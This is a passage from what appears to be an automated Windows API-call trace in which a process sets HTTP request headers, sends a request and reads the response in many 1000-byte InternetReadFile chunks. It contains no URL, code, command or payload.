(hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0106.949] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0106.949] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0106.949] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0106.949] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0106.949] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0107.042] InternetSetFilePointer (in: hFile=0xcc000c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0, dwContext=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.042] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970048, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970048*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.043] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970430, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970430*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.043] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970818, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970818*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.043] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970c00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970c00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.043] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3970fe8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3970fe8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.043] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39713d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39713d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39717b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39717b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3971ba0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3971ba0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.056] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3971f88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3971f88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972370, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972370*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972758, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972758*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972b40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972b40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3972f28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3972f28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.057] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973310, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973310*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39736f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39736f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973ae0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973ae0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3973ec8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3973ec8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39742b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39742b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974698, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974698*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974a80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974a80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.058] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3974e68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3974e68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975250, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975250*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975638, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975638*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975a20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975a20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3975e08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3975e08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39761f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39761f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.059] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39765d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39765d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39769c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39769c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3976da8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3976da8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977190, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977190*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977578*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977960*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3977d48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3977d48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.060] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978130*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978518, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978518*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978900*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3978ce8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3978ce8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39790d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39790d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39794b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39794b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39798a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39798a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.061] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3979c88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3979c88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a070, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a070*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a458, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a458*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397a840, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397a840*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397ac28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397ac28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b010, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b010*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b3f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b3f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.062] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397b7e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397b7e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.063] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397bbc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397bbc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.063] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397bfb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397bfb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.063] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397c398, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397c398*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.063] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397c780, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397c780*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.063] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397cb68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397cb68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.063] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397cf50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397cf50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397d338, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397d338*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397d720, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397d720*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397db08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397db08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397def0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397def0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397e2d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397e2d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397e6c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397e6c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.064] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397eaa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397eaa8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397ee90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397ee90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397f278, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397f278*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397f660, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397f660*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397fa48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397fa48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x397fe30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x397fe30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980218, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980218*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.065] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980600, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980600*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.066] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39809e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39809e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.066] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3980dd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3980dd0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.066] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39811b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39811b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.066] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39815a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39815a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.066] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3981988, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3981988*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.066] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3981d70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3981d70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.067] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982158, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982158*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.067] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982540, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982540*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.067] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982928, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982928*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.068] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3982d10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3982d10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.070] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39830f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39830f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.071] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39834e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39834e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.071] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39838c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39838c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.074] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3983cb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3983cb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.075] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984098, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984098*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.076] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984480, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984480*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.077] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984868, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984868*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.079] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3984c50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3984c50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.079] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985038, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985038*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.082] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985420, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985420*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.083] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985808, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985808*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.084] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985bf0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985bf0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.085] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3985fd8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3985fd8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.085] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39863c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39863c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.086] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39867a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39867a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.086] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3986b90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3986b90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.086] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3986f78, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3986f78*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987360, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987360*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987748, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987748*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987b30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987b30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3987f18, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3987f18*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988300, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988300*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.087] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39886e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39886e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.088] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988ad0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988ad0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.088] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3988eb8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3988eb8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.088] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39892a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39892a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.088] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989688, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989688*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.088] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989a70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989a70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.088] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3989e58, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3989e58*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0107.089] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x398a240, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x398a240*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 